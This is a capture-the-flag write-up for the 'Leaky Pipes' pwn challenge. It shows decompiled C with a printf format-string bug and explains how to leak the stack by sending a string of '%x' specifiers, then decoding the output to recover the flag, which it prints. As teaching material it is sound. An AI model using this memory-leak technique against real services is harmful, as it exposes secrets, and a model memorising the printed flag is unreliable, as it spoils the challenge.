Leaky Pipes [Pwn]
The challenge provided us with a nc connection to the server hosting the binary and the binary itself. So, without launching Ghidra or IDA, we can use the following tool to disassemble the binary.
The disassembled file is as follows:
int __cdecl readflag(char *s, int n)
{
FILE *stream; // [esp+Ch] [ebp-Ch]
stream = fopen("./flag.txt", "r");
if ( !stream )
{
printf("%s %s\n", "Please create 'flag.txt' in this directory with your", "own debugging flag.");
exit(0);
}
fgets(s, n, stream);
return fclose(stream);
}
//----- (08049361) --------------------------------------------------------
int vuln()
{
char format[128]; // [esp+0h] [ebp-C8h] BYREF
char s[68]; // [esp+80h] [ebp-48h] BYREF
readflag(s, 64);
printf("Tell me your secret so I can reveal mine ;) >> ");
__isoc99_scanf("%127s", format);
puts("Here's your secret.. I ain't telling mine :p");
printf(format);
return putchar(10);
}
// 80491A0: using guessed type int __cdecl __isoc99_scanf(_DWORD, _DWORD);
// 8049361: using guessed type char s[68];
//----- (080493ED) --------------------------------------------------------
int __cdecl main(int argc, const char **argv, const char **envp)
{
__gid_t v4; // [esp+0h] [ebp-Ch]
setvbuf(stdout, 0, 2, 0);
v4 = getegid();
setresgid(v4, v4, v4);
vuln();
return 0;
}The vulnerability present in the binary is within the printf function, the complete detail on this vulnerability can be found on my old blog here:
With that explanation, no script is needed here. By connecting to the instance given to us, we can just insert a 100 %x's and expect the binary to leak out information from the stack.
Now, all we need to do is to swap the endianness of the output and convert the output from hex. However, no flag appeared. So, referring to my old blog post, there may be some "bad bytes".
By removing some of the characters from the start of the hex output, we finally got the flag!
flag: OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l}Last updated